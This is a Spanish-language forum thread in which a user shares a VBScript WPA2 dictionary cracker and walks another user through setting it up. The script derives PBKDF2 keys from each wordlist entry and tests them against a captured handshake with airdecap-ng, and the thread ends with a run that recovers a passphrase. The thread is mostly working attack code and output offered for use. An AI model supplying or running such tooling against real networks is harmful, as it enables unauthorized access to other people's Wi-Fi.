WPA crackeador con diccionario

Iniciado por Heolo, 12 Mayo 2015, 16:00 PM

0 Miembros y 1 Visitante están viendo este tema.

Heolo

Hola mis queridos colegas !!

Bueno, tenia mucho tiempo que no andaba por aqui, pero bueno, en los ultimos dias he estado programando un pequeño script en vbs el cual me ha dado buenos resultados es rapido y no consume CPU, ni memoria como el ya conocido aircrack, se me ocurrio hacelo de esta manera ( cosas de locos, ya saben )
aqui les dejo el codigo si alguien puede perfeccionarlo pues mucho mejor,[/img][/img][/img] requisitos :

airdecap-ng (librerias)
ChilkatAx-9.5.0-win32.zip ( http://www.chilkatsoft.com/download/9.5.0.49/ChilkatAx-9.5.0-win32.zip )
diccionario y dale pedale.....

Código (vb) [Seleccionar]
Dim fso, outFile, variable, pw, tama

' abre el diccionario
acum = 0
const ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile _
("f:\wpa2\clarohauwai-3.txt", ForReading)
start_time = time()

' empieza a recorrer el diccionario
Do Until objTextFile.AtEndOfStream
strNextLine = objTextFile.Readline
arrServiceList = Split(strNextLine)

Set crypt = CreateObject("Chilkat_9_5_0.Crypt2")
success = crypt.UnlockComponent("pepe")
If (success <> 1) Then
   outFile.WriteLine(crypt.LastErrorText)
   WScript.Quit
End If

'  pasada del diccionario WPA passphrase
pw = arrServiceList(0)          'Induction
pwCharset = "ansi"
acum = acum + 1

'  Hash algoritmo: sha1, md2, md5, etc.
hashAlg = "sha1"

' ssid y lo convierte a hex
strString = "Claro_xxxx"     'Coherer
strHex =""
For i=1 To Len(strString)
   strHex = strHex + Hex(Asc(Mid(strString,i,1)))
Next

' asigna la variable a ssidHex
ssidHex = strHex

'  la WPA key calcula 4096 interaciones.
iterationCount = 4096
outputBitLen = 256
enc = "hex"

start_time2 = time()

' reliza el calculo del hash
wpaHexKey = crypt.Pbkdf2(pw,pwCharset,hashAlg,ssidHex,iterationCount,outputBitLen,enc)

' llama el airdecap y le envia el hash calculado
Set WshShell = CreateObject("WScript.Shell")
Return = WshShell.Run("f:\wpa2\airdecap-ng.exe -l -k " & wpaHexKey & " -e " & strString & " F:\WPA2\rules\Claro_xxxx.cap",0, True)

' imprime variables
 WScript.echo "SSID        :", strString  ,            "                     | Cantidad:",acum
 WScript.Echo "------------------------------------------------------------------------------"
 WScript.echo "CLAVE       :", pw
 WScript.Echo "------------------------------------------------------------------------------"
 WScript.echo "WPA PMK     :", wpaHexKey
 WScript.Echo "------------------------------------------------------------------------------"

' determina el size del archivo que genera el airdecap
filename = ("F:\WPA2\rules\Claro_xxxx-dec.cap")
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(filename)
tama = f.Size

' si el archivo -dec.cap es alterado, ocea cuando se le envia el hash entonces....blablabla
If tama > 24 Then
  WScript.Echo " "
  WScript.Echo "========================================"
  WScript.Echo " "
  WScript.Echo "Clave desifrada 100% :", pw
  WScript.Echo " "
  WScript.Echo "========================================"
  Exit do

End If


Loop

'airdecap-ng -k A288FCF0CAAACDA9A9F58633FF35E8992A01D9C10BA5E02EFDF8CB5D730CE7BC -e Coherer wpa-Induction.pcap | find "decrypted WPA"


Suerte !!!!

Mod: Los códigos deben ir en GeSHi

El_Andaluz

#1
Gracias por el aporte Heolo, pero esto como se ejecuta en Wifislax por ejemplo se supone que este programa es para descifrar claves Wpa metiendo antes el handshake ? o haces un diccionario y craquear ? No me ha quedado muy claro, perdona.

Heolo

#2
ahhh, no fijate es un vbscript bajo DOS, es algo simple, como puedes ver aun no esta terminado pero funciona, solo debes colocar la ruta del diccionario, poner el nombre del ssid y el nombre del archivo que genera el airdecap-ng y el nombre del handshake es algo simple....

El_Andaluz

Citarahhh,, no fijate es un vbscript bajo DOS, es algo simple, como puedes ver aun no esta terminado pero funciona, solo debes colocar la ruta del diccionario, poner el nombre del ssid y el nombre del archivo que genera el airdecap-ng es algo simple....

Han vale que no lo has terminado pero puede funcionar bien para crackear lo he probado en Windows7 pero me salta un mensaje de error no se algo habré hecho mal después he leído el reamed pero esta todo en ingles y al verdad que yo de ingles estoy cortito, puede hacer un vídeo o poner en imagines los pasos a seguir para hacerlo bien si no te importa. Muchas gracias.

Heolo

Te comento que aun no esta terminado pues falta ponerlo para pasarles arugumentos, como el nombre de diccionario, el archivo cap el nomebre del ssid.

como comente al principio, debes tener en el archivo airedecap-ng.exe y sus respectivas dll, como por igual la dll del programa ChilkatAx-9.5.0-win32.zip del cual puse el link todos estos conjunto con el diccionario deben estar en una misma carpeta :

( Aqui pones la ruta del diccionario o mejor si esta en la misma carpeta :)
----------------------------------------------------
' abre el diccionario
acum = 0
const ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile _("f:\wpa2\clarohauwai-3.txt", ForReading)
start_time = time()
------------------------------------------------------------------
( Aqui colocas en la variable strString el ssid a atacar )

' ssid y lo convierte a hex
strString = "Claro_xxxx"     'Coherer
strHex =""
For i=1 To Len(strString)
    strHex = strHex + Hex(Asc(Mid(strString,i,1)))
Next
-------------------------------------------------------------------

( Aqui colocas el nombre del handshake el mio aqui es Claro_xxx.cap )

' llama el airdecap y le envia el hash calculado
Set WshShell = CreateObject("WScript.Shell")
Return = WshShell.Run("f:\wpa2\airdecap-ng.exe -l -k " & wpaHexKey & " -e " & strString & " F:\WPA2\rules\Claro_xxx.cap",0, True)
--------------------------------------------------------------------------------------

( y por ultimo el nombre de archivo que genera el airdecap-ng al pasarle el hash que hemos calculado, el mio aqui es : Claro_xxxx-dec.cap)
---------------------------------------------------------------------------------------
' determina el size del archivo que genera el airdecap
filename = ("F:\WPA2\rules\Claro_xxxx-dec.cap")
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(filename)
tama = f.Size

Esto es todo, debe funcionar,

Saludos !!!!

El_Andaluz

#5
Me sigue saltando un erro no se por que lo que hago mal te comento el mensaje que me salga dice lo siguiente: Error: El componente Activex no puede crear el objeto: Chikat_9_5_0.Crypt2.

Origen: Error de Microft VBScript en tiempo de ejecución. No se como ejecutarlo en windows7 me salta esos errores que te digo.

Entones me tengo que descargar el archivo airedecap-ng.exe y sus respectivas dlll donde me puede descargar eso para que me funcione todo es que no lo veo dentro de la carpeta que pusiste los siento soy muy torpe.

Heolo

#6
Es simple, en la carpeta Chikat_9_5_0.Crypt2.  exite un archivo (register_win32.bat), permite que actives la dll, ejecutalo si es 32 o 64 dependiento recuerda que deben estar las dll en la caperta., ahh el archivo airedecap-ng esta en aircrack para windows
descargalo y alli viene...

Suerte

El_Andaluz

CitarEs simple, en la carpeta Chikat_9_5_0.Crypt2.  exite un archivo (register_win32.bat), permite que actives la dll, ejecutalo si es 32 o 64 dependiento recuerda que deben estar las dll en la caperta., ahh el archivo airedecap-ng esta en aircrack para windows
descargalo y alli viene...

Mi portátil es de 32 bit osea me viene bien bueno probare como me dices a ver si tengo suerte y ya te comentare. Gracias

Heolo

#8
Hola !!!

Por aqui les envio una prueba realzada, al termino para los que esten interesados le pondre un link para la descarga : Saludos

F:\WPA2>Hashpmk-dh
Hashpmk-dh 1.0 -(C) 2015-2016 by Heolo

use: hashpmk-dh <ssid> <diccionario> <handshake>

Opciones :

ssid        : nombre del identificador wifi
diccionario : nombre del diccionario
handshake   : archivo handshake (cap, pcap..etc)


F:\WPA2>Hashpmk-dh Coherer clarohauwai-1.txt wpa-Induction.pcap

Probando : 1 : SBUGHWAP1O50M : 5CF1CA924A101D096F94ACC8F76B116F1A58A04F1640FBAAEF613B2719A1FE0E

Probando : 2 : T6QDMARP30ZLI : 3DEA1D4F48BB61CB333EAAEA08E5513E8FFF5B171346813E1FB9F563B436C30F

Probando : 3 : 8EQD0UFIKJZMW : 61EEA069DF2E6278981CB376F6B488C0E4B0CBA2E579CD4AE4763DBD6842B6F3

Probando : 4 : A2LNWCVFUEK09 : F826BC49F875BD239D50DEFC3644050188F022E4E0195F5B3058AAA86B7F3B45

Probando : 5 : O6V7WP3DMS49H : 8357E06064FB338858ACA04AD38CB5BEB84215D4EB892FD3CF640031AE427C16

Probando : 6 : CBTR632OP7A48 : 02AC460A59980BA10E29BA343EF1D1A4F7B6126073CC7F2727961118FFF1D7D3

Probando : 7 : DNOR58SMEQZT7 : D6057C7C874D9DFB3135E0FFD855AD89EC2FDF63A24790E82948F42021ED26AB

Probando : 8 : 801AB5QCLDUKE : E0663F7AA9A26792FF6D10E3DB690FD179727A04285380D8CC24CBBFB8EE7A17

Probando : 9 : TFQ9H4OEVKML5 : D4BDF6FB1BF4FFD6F181BEE2B59C7EA48FBC259585C58B8F694F6159AF484464

Probando : 10 : V8JG7NSYEM23T : DB6DDFFF837F832D45A2BEEBF8E5BD27DD97BE7E3DEF794E2581DC13F65B5087

Probando : 11 : NUZHI1EP3A5YV : 65565E8DCAD7AC4B25AD0F38E9BD69E1E59BCD38424AEFA5E76F018A68CE2417

Probando : 12 : FY2OE9IJ3T5S8 : 8B3793E8C6D1161F9D0AB5341C797F45A53EDC6FD9DE45415AD8F85E73A5BAF8

Probando : 13 : WD34OMB7E2VC8 : 8692071F8352BF635FB102B163C55DE6F2331BA2587CD1D68312F074813A1D5C

Probando : 14 : P8GWHERV7QM1S : F3A42C93D21FF2AA1BCE21CE50DA133D30E4C19AEC1F709ED8C02811965E66E2

Probando : 15 : VCJZWR8ITBP7Q : 04562BE35439729812A8944F662D18E6AF713ECDD0B0CB7C478A245AE6694891

Probando : 16 : TJF49BK2MO506 : 5C331FB35AA8730673E46DC91C5A007B80C60EAA43D43941E6E182255248BF78

Probando : 17 : VIY3A6PJ02GB7 : B7EFF16FED66A72CA75BE07B7A6B267FE206EB2451CBA33AA0A67B7BD7B84E37

Probando : 18 : 4609WB2YVM8LI : AAA1CAFB697A930F762B7244EA6A731B8DEE7435CA0FC8EA1AF0929831352A9F

Probando : 19 : V3EDHL1KJRCAQ : 9CD0C1255E4D43802A71A26B62391CA26F03C881BD3437F8C97C839CE349ABA6

Probando : 20 : 35IKWYEC906OB : 1D697F3CB4FAE9C053CF31F83448BA140D06664A406F7800A7FD8815FA8766ED

Probando : 21 : 689KSL7JD0RVU : 7A0AFBE227A50557F32830792B2AF0E5A055DBDA803C72C68C82EC8484B21887

Probando : 22 : YNKSA9UH8J7OI : E1382F001D7ABB0855262F6385250142A4D98841A5045DC87FCFC21C69D787CB

Probando : 23 : MZNG4PTIV8HRE : 72736C07F0210A03486E5647BAA43221CC5994516C387F4D95EF07D24516C994

Probando : 24 : 6F0P75AJWQRIM : 37B769A43073AF46990EE61D7AE59DDAA5ED1DAAF270D8B6A666A8BC64409676

Probando : 25 : 0WU4Y6KPVMI1C : 9F9675D1C3B75470F6848567E59808192CAE220D0CB57C58837FD8780D2EBF93

Probando : 26 : Induction : A288FCF0CAAACDA9A9F58633FF35E8992A01D9C10BA5E02EFDF8CB5D730CE7BC

-------------------------------

Ssid :Coherer

Clave desifrada 100% :Induction

-------------------------------